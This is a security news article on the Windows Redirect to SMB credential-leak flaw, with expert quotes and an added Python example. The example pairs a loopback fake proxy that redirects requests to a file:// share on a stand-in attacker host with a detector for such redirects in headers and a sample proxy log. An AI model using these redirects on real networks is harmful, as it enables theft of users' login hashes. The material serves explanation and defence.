There is a serious vulnerability in all supported versions of Windows that can allow an attacker who can intercept or tamper with some portion of a victim’s network traffic (a man-in-the-middle position) to capture users’ Windows login credentials. The bug lies in the way that Windows, and software that relies on its HTTP handling, follows HTTP redirects, and researchers say it affects a wide range of applications, including iTunes and Adobe Flash.
The vulnerability, disclosed Monday by researchers at Cylance, is an extension of research done by Aaron Spangler nearly 20 years ago, and it’s known as Redirect to SMB. The weakness lets an attacker force a victim’s machine to attempt authentication to an attacker-controlled SMB server, handing over the user’s name, domain and hashed password in the process.
“Redirect to SMB is a way for attackers to steal valuable user credentials by hijacking communications with legitimate web servers via man-in-the-middle attacks, then sending them to malicious SMB (server message block) servers that force them to spit out the victim’s username, domain and hashed password,” a blog post by Brian Wallace from Cylance says.
“We uncovered Redirect to SMB while hunting for ways to abuse a chat client feature that provides image previews. When a URL to an image was received, the client attempted to show a preview of the image. Inspired by Aaron’s research some 18 years ago, we promptly sent another user a URL starting with file:// which pointed to a malicious SMB server. Surely enough, the chat client tried to load the image, and the Windows user at the other end attempted to authenticate with our SMB server.”
The Redirect to SMB flaw not only affects all of the current versions of Windows, but also Flash, some GitHub clients, some Oracle software and several security applications. Experts at the CERT/CC at Carnegie Mellon University warned that what the attacker captures is the hashed form of the victim’s password, which can then be cracked offline.
“Many software products use HTTP requests for various features such as software update checking. A malicious user can intercept such requests (such as with a MITM proxy) and use HTTP Redirect to redirect the victim to a malicious SMB server. If the redirect is a file:// URL and the victim is running Microsoft Windows, Windows will automatically attempt to authenticate to the malicious SMB server by providing the victim’s user credentials to the server. These credentials can then be logged by the malicious server. The credentials are encrypted, but may be “brute-forced” to break the encryption,” the CERT advisory says.
Microsoft has not released a patch for this vulnerability. The underlying weakness is old, but researchers say the attack technique developed by Cylance makes exploiting it much simpler than it has been.
“This is a novel attack that can be easily abused to significantly increase the exploitability of Windows client systems communicating on untrusted or compromised networks. While tools like KARMA, Metasploit, and Responder.py depend on the user to make a SMB connection back to the attacker, the Cylance research improves on the attack by abusing how HTTP redirects are handled by callers of the URLMon API,” said HD Moore, chief research officer at Rapid7.
“The Cylance research shows that instead of waiting for the user to open their browser or manually connect to a network share, an attacker can look for automated HTTP requests sent by background applications and redirect these to file:// URLs, triggering a SMB connection and automatic authentication. Given how many applications a typical laptop or tablet has running in the background, this can drastically speed up SMB capture and relay attacks against Windows-based laptops and tablets connecting to insecure wireless networks.
“On a Windows 8.1 laptop, at least 50 different HTTP connections were made after a restart and within 5 minutes, most of which could be hijacked by a network-local attacker to force SMB authentication to a malicious service. The source of these connections ranged from OEM “update” checks to weather and news applications.”
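The exchange the CERT advisory describes (a background HTTP request answered with a redirect to a file:// URL) and the kind of automated request HD Moore counts, as an added example that is not Cylance’s, CERT’s or Rapid7’s code. The fake proxy below does the attacker’s half; the checks do the defender’s half, both on a captured Location header and over proxy log lines. The hostnames (attacker.example, updates.vendor.example and so on), the proxy log format and its lines are constructed for the example, and the UNC and file:////host/share spellings the check also catches are a generalisation beyond the file://host/share form the article names.

```python
"""Redirect to SMB, as an added example (not Cylance's or CERT's code).

Two pieces: a stand-in for the man-in-the-middle that answers an
application's background HTTP request with a 302 to a file:// URL, and the
check a proxy, IDS or HTTP client should apply to a Location header before
acting on it. Hostnames (attacker.example, updates.vendor.example) and the
proxy log lines are constructed for the example; the log format is assumed,
not any particular product's.
"""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit

# Constructed: the Location a MITM would inject in place of a real update URL.
MALICIOUS_LOCATION = "file://attacker.example/share/update.xml"


class RedirectingHandler(BaseHTTPRequestHandler):
    """Plays the MITM proxy: every GET is answered with a 302 to file://."""

    def do_GET(self):
        self.send_response(302)
        self.send_header("Location", MALICIOUS_LOCATION)
        self.end_headers()

    def log_message(self, format, *args):  # silence per-request logging
        pass


def start_redirector():
    """Bind the fake proxy to an ephemeral loopback port; returns (server, port)."""
    server = HTTPServer(("127.0.0.1", 0), RedirectingHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def is_smb_redirect(location):
    """True if a Windows caller would resolve this Location over SMB.

    Covers the file://host/share form the article describes and, going a step
    beyond it, a bare UNC path (\\\\host\\share) and the file:////host/share
    spelling, both of which also name a remote share. file:///C:/... and
    file://localhost/... are local and not flagged.
    """
    loc = location.strip()
    if loc.startswith("\\\\"):
        return True
    parts = urlsplit(loc)
    if parts.scheme.lower() != "file":
        return False
    return parts.netloc not in ("", "localhost") or parts.path.startswith("//")


def probe(port, path="/update/check.xml"):
    """Issue one request the way a background updater would, but do NOT follow
    the redirect; instead report where it points and whether it is SMB-bound."""
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    try:
        conn.request("GET", path)
        resp = conn.getresponse()
        resp.read()
        location = resp.getheader("Location", "")
        return {"status": resp.status, "location": location,
                "smb_redirect": is_smb_redirect(location)}
    finally:
        conn.close()


# Constructed proxy log: "<time> <client> <method> <url> <status> <Location=... or ->".
SAMPLE_PROXY_LOG = """\
2015-04-13T09:58:02Z 10.0.0.7 GET http://updates.vendor.example/check.xml 302 Location=file://attacker.example/share/check.xml
2015-04-13T09:58:05Z 10.0.0.7 GET http://weather.example/api/today 200 -
2015-04-13T09:58:09Z 10.0.0.9 GET http://news.example/feed 302 Location=https://news.example/feed/
2015-04-13T09:58:11Z 10.0.0.9 GET http://oem.example/driverupdate 302 Location=\\\\attacker.example\\share\\driver.cab
"""


def scan_proxy_log(text):
    """Return the 3xx responses whose Location would trigger SMB authentication."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 6:
            continue
        ts, client, _method, url, status, extra = fields[:6]
        if not status.startswith("3") or not extra.startswith("Location="):
            continue
        location = extra[len("Location="):]
        if is_smb_redirect(location):
            hits.append({"time": ts, "client": client, "url": url,
                         "location": location})
    return hits


if __name__ == "__main__":
    server, port = start_redirector()
    try:
        print("live probe:", probe(port))
    finally:
        server.shutdown()
    for hit in scan_proxy_log(SAMPLE_PROXY_LOG):
        print("log hit:", hit)
```

Run stand-alone, the script stands up the fake proxy on loopback, shows the 302 with its file:// Location as a client would receive it, and then lists the two log lines (the update check and the OEM driver check) whose redirect would send a Windows host to a share. The Python client here deliberately stops at the redirect; the point of the article is that a URLMon-based Windows caller does not, and authenticates to the share instead. The same `is_smb_redirect` test is what a proxy or HTTP library should apply before following any 3xx, and since the credential leak needs the SMB connection itself, blocking outbound TCP 139 and 445 toward untrusted networks cuts the attack off regardless of which application issued the request.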
One likely use for this vulnerability is as one stage of a multi-stage attack.
“I would expect this vulnerability to be used as part of a two-stage phishing attack: First try to exploit vulnerabilities, including this one, after getting the user to click a link in an email, and then attempt to do something further by getting the user to “log in” to a fake portal, or downloading software that takes over the machine. In this way, attackers can be moderately effective even if the user doesn’t fall for anything after opening the page,” said Patrick Nielsen, senior security researcher at Kaspersky Lab.
“The SMB authentication payload is interesting mainly to perform further attacks against a single target entity, and particularly if it’s lured out of a user with elevated access, like an Active Directory Operator.”